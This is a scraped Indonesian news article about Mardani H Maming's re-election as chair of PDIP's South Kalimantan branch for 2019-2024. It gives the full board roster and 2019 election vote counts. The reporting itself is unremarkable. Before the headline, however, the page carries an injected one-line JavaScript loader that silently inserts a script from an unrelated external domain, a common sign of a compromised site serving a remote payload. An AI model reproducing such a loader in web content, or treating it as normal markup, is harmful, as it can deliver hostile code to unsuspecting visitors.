(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Didukung Bulat Kader, Mardani Maming Kembali Pimpin DPD PDIP Kalsel 2019-2024


BANJARMASIN, Dukungan bulat kader dalam Konferensi Daerah (Konferda) V DPD PDIP Kalsel, mengantar kembali Mardani H Maming memimpin partai berlogo banteng moncong putih tersebut periode 2019-2024. Ia terpilih secara aklamasi oleh utusan Konferda yang terdiri dari PAC dn DPC PDIP se-Kalsel, di Hotel Rattan In, Banjarmasin, Senin (8/7).

Turut mendampingi Maming sebagai Sekretaris DPD adalah Muhammad Syaripuddin dan Bendahara DPD dipegang oleh Sulaiman Umar. (Baca: Lihat Daftar Pengurus DPD PDIP Kalsel 2019-2019).

Terpilihnya Maming memang sudah diprediksi sebelumnya. Karena jauh sebelum pelaksanaan Konferda, PAC dan DPC sudah banyak menyampaikan aspirasinya agar mantan Bupati Tanah Bumbu (Tanbu) tersebut bisa kembali memimpin partai untuk periode kedua.

Hal ini sebagaimana disampaikan pengurus PDIP Muhaimin yang mengatakan  aspirasi Pimpinan Anak Cabang (PAC) dan Dewan Pengurus Cabang (DPC) se-Kalsel menghendaki agar Mardani Maming kembali memegang tampuk pimpinan. “Hasil penjaringan suara PAC dan DPC PDIP tetap menginginkan beliau. Kader menganggap bahwa selama ini beliau mampu membawa roda organisasi dan program partai dengan baik. Salah satu parameternya adalah perolehan suara PDIP pada pemilu 2019 lalu,”  terangnya.

Hal sama sebelumnya disampaikan tokoh PDIP yang juga Wakil Walikota Banjarmasin H Hermansyah kepada kanalkalimantan.com. Ia  mengatakan, sebagai pengurus partai ia mendukung pencalonan kembali Mardani Maming. Hal ini lantaran tokoh muda tersebut dianggap bisa membawa soliditas kader banteng serta meningkatkan perolehan suara pada pemilu 2019 lalu.

“Sebagai pengurus, saya pribadi mendukung pencalonan kembali Mardani Maming. Sementara terkait sikap cabang, tentunya masing-masing DPC yang menentukan. Walau yang saya tahu dukungan terhadap beliau memang menguat,” ungapnya.

PENGURUS DPD PDIP KALSEL PERIODE 2019-2024

KETUA : Mardani H Maming
SEKRETARIS: M Syaripuddin
Wakil Sekretaris Internal: Masriah
Wakil Sekretaris Eksternal: Akhmad Suntung Yani
BENDAHARA: Bendahara Sulaiman Umar
Wakil Bendahara: Normiati
BIDANG INTERNAL:
Wakil Ketua Bidang Kehormatan Partai:  H Supiansyah ZA
Wakil Ketua Bidang Kaderisasi dan Ideologi : Mardian Susanto
Wakil Ketua Bidang Organisasi:  Fazlur Rahman
Wakil Ketua Bidang Pemenangan Pemilu : Syarifuddin H Maming
Wakil Ketua Bidang Komunikasi Politik: Hermansyah.
BIDANG PEMERINTAHAN:
Wakil Ketua Bidang Politik, Hukum & Keamanan: M Rosehan Noor Bahri
Wakil Ketua Bidang Ekonomi: Bambang Alamsyah
Wakil Ketua Bidang Pembangunan Manusia dan Kebudayaan: Imam Prusastowo
Wakil Ketua Bidang Maritim: Novianti
BIDANG KERAKYATAN:
Wakil Ketua Bidang Buruh: Novri Ompusunggu
Wakil Ketua Bidang Tani: M Rifqinizamy Karsayuda
Wakil Ketua Bidang Nelayan: Suryanti
Wakil Ketua Bidang Perempuan & Anak:  Hanaa Muthmainna Napirin
Wakil Ketua Bidang Bidang Pemuda dan Olahraga: Wahyudi Rahman
Wakil Ketua Bidang Komunitas Seni dan Budaya: Rosiyati MH Thamrin
Wakil Ketua Bidang Pariwisata: Meililiyanie
Wakil Ketua Bidang Ekonomi Kreatif: Dahlina

Dari hasil pemilu lalu, PDIP Kalsel menempati rangking kedua setelah Partai Golkar yang mampu meraih 343.144 suara pada pemilu 2019. Di posisi kedua, hanya terpaut tipis PDIP mengumpulkan  334.396 suara. Disusul kemudian oleh Partai Gerindra yang memperoleh 288.899 suara.

Dengan suara tersebut, meskipun tak berhasil menambah jatah kursi DPRD Kalsel, namun PDIP diluar dugaan mampu meraih tiga kursi di DPR RI dari cuma 2 kursi yang diprediksi sebelumnya. Dua nama diantaranya bahkan meraup suara signifikan di Dapil Kalsel 1 dan 2. Dua kader tersebut yakni Syafruddin Maming- yang merupakan kakak dari Mardani Maming, dan Sulaiman Umar.

Konfercab dan Konferda yang dihadiri oleh para perwakilan partai dari seluruh Kalsel ini juga memutuskan bidang internal Wakil Ketua Bidang Kehormatan Partai H Supiansyah ZA, Wakil Ketua Bidang Kaderisasi dan Ideologi Mardian Susanto, Wakil Ketua Bidang Organisasi Fazlur Rahman, Wakil Ketua Bidang Pemenangan Pemili Syarifuddin H Maming, dan Wakil Ketua Bidang Komunikasi Politik Hermansyah.

Di Bidang Pemerintahan, Wakil Ketua Bidang Politik, Hukum & Keamanan M Rosehan Noor Bahri, Wakil Ketua Bidang Ekonomi Bambang Alamsyah, Wakil Ketua Bidang Pembangunan Manusia dan Kebudayaan Imam Prusastowo, dan Wakil Ketua Bidang Maritim Novianti.

Berlanjut di Bidang Kerakyatan, Wakil Ketua Bidang Buruh Novri Ompusunggu, Wakil Ketua Bidang Tani M Rifqinizamy Karsayuda, Wakil Ketua Bidang Nelayan Suryanti, Wakil Ketua Bidang Perempuan & Anak Hanaa Muthmainna Napirin, Wakil Ketua Bidang Bidang Pemuda dan Olahraga Wahyudi Rahman, Wakil Ketua Bidang Komunitas Seni dan Budaya, Rosiyati MH Thamrin, Wakil Ketua Bidang Pariwisata Meililiyanie, dan Wakil Ketua Bidang Ekonomi Kreatif Dahlina. (mario)

Reporter : Mario
Editor : Chell

Desy Arfianty

Recent Posts

PKS Banjarbaru Buka Penjaringan, Siap Koalisi Tawarkan Kader Sendiri

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pimpinan Darah Partai Keadilan Sejahtera (PKS) Kota Banjarbaru membuka pendaftaran bakal… Read More

44 menit ago

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

15 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

15 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

15 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

19 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

21 jam ago

This website uses cookies.